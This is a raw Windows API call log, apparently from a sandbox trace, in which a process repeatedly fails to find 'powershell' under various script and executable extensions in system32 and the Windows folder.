	[0401.589] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.050] SetErrorMode (uMode=0x1) returned 0x1
	[0402.051] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0402.051] SetErrorMode (uMode=0x1) returned 0x1
	[0402.051] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.058] SetErrorMode (uMode=0x1) returned 0x1
	[0402.060] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0402.060] SetErrorMode (uMode=0x1) returned 0x1
	[0402.060] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.069] SetErrorMode (uMode=0x1) returned 0x1
	[0402.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.070] SetErrorMode (uMode=0x1) returned 0x1
	[0402.070] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.071] SetErrorMode (uMode=0x1) returned 0x1
	[0402.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.071] SetErrorMode (uMode=0x1) returned 0x1
	[0402.071] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.071] SetErrorMode (uMode=0x1) returned 0x1
	[0402.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.071] SetErrorMode (uMode=0x1) returned 0x1
	[0402.072] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.072] SetErrorMode (uMode=0x1) returned 0x1
	[0402.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.072] SetErrorMode (uMode=0x1) returned 0x1
	[0402.072] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.072] SetErrorMode (uMode=0x1) returned 0x1
	[0402.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.072] SetErrorMode (uMode=0x1) returned 0x1
	[0402.073] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.073] SetErrorMode (uMode=0x1) returned 0x1
	[0402.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.073] SetErrorMode (uMode=0x1) returned 0x1
	[0402.073] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.073] SetErrorMode (uMode=0x1) returned 0x1
	[0402.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.074] SetErrorMode (uMode=0x1) returned 0x1
	[0402.074] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.074] SetErrorMode (uMode=0x1) returned 0x1
	[0402.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.074] SetErrorMode (uMode=0x1) returned 0x1
	[0402.074] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.074] SetErrorMode (uMode=0x1) returned 0x1
	[0402.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.075] SetErrorMode (uMode=0x1) returned 0x1
	[0402.075] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.075] SetErrorMode (uMode=0x1) returned 0x1
	[0402.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.075] SetErrorMode (uMode=0x1) returned 0x1
	[0402.075] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.075] SetErrorMode (uMode=0x1) returned 0x1
	[0402.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.076] SetErrorMode (uMode=0x1) returned 0x1
	[0402.076] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.076] SetErrorMode (uMode=0x1) returned 0x1
	[0402.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.076] SetErrorMode (uMode=0x1) returned 0x1
	[0402.076] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.076] SetErrorMode (uMode=0x1) returned 0x1
	[0402.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.077] SetErrorMode (uMode=0x1) returned 0x1
	[0402.077] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.077] SetErrorMode (uMode=0x1) returned 0x1
	[0402.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.077] SetErrorMode (uMode=0x1) returned 0x1
	[0402.077] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.077] SetErrorMode (uMode=0x1) returned 0x1
	[0402.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0402.078] SetErrorMode (uMode=0x1) returned 0x1
	[0402.078] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.078] SetErrorMode (uMode=0x1) returned 0x1
	[0402.078] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.078] SetErrorMode (uMode=0x1) returned 0x1
	[0402.079] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.079] SetErrorMode (uMode=0x1) returned 0x1
	[0402.079] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.079] SetErrorMode (uMode=0x1) returned 0x1
	[0402.079] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.079] SetErrorMode (uMode=0x1) returned 0x1
	[0402.080] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.080] SetErrorMode (uMode=0x1) returned 0x1
	[0402.080] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.080] SetErrorMode (uMode=0x1) returned 0x1
	[0402.080] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.081] SetErrorMode (uMode=0x1) returned 0x1
	[0402.081] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.081] SetErrorMode (uMode=0x1) returned 0x1
	[0402.081] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.081] SetErrorMode (uMode=0x1) returned 0x1
	[0402.081] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.082] SetErrorMode (uMode=0x1) returned 0x1
	[0402.082] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.082] SetErrorMode (uMode=0x1) returned 0x1
	[0402.082] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.082] SetErrorMode (uMode=0x1) returned 0x1
	[0402.082] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.083] SetErrorMode (uMode=0x1) returned 0x1
	[0402.083] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.083] SetErrorMode (uMode=0x1) returned 0x1
	[0402.083] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.083] SetErrorMode (uMode=0x1) returned 0x1
	[0402.083] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.084] SetErrorMode (uMode=0x1) returned 0x1
	[0402.084] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.084] SetErrorMode (uMode=0x1) returned 0x1
	[0402.084] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.084] SetErrorMode (uMode=0x1) returned 0x1
	[0402.085] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.085] SetErrorMode (uMode=0x1) returned 0x1
	[0402.085] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.085] SetErrorMode (uMode=0x1) returned 0x1
	[0402.085] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.085] SetErrorMode (uMode=0x1) returned 0x1
	[0402.086] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.086] SetErrorMode (uMode=0x1) returned 0x1
	[0402.086] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.086] SetErrorMode (uMode=0x1) returned 0x1
	[0402.087] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.087] SetErrorMode (uMode=0x1) returned 0x1
	[0402.087] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.087] SetErrorMode (uMode=0x1) returned 0x1
	[0402.087] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.088] SetErrorMode (uMode=0x1) returned 0x1
	[0402.088] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.088] SetErrorMode (uMode=0x1) returned 0x1
